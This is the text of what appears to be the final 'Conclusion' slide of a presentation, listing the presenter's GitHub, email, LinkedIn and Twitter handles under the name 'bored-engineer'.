  • 60. CONCLUSION ➤ GitHub: http://www.github.com/bored-engineer ➤ Email: me@bored.engineer ➤ LinkedIn: https://www.linkedin.com/in/bored-engineer ➤ Twitter: @TheBoredEng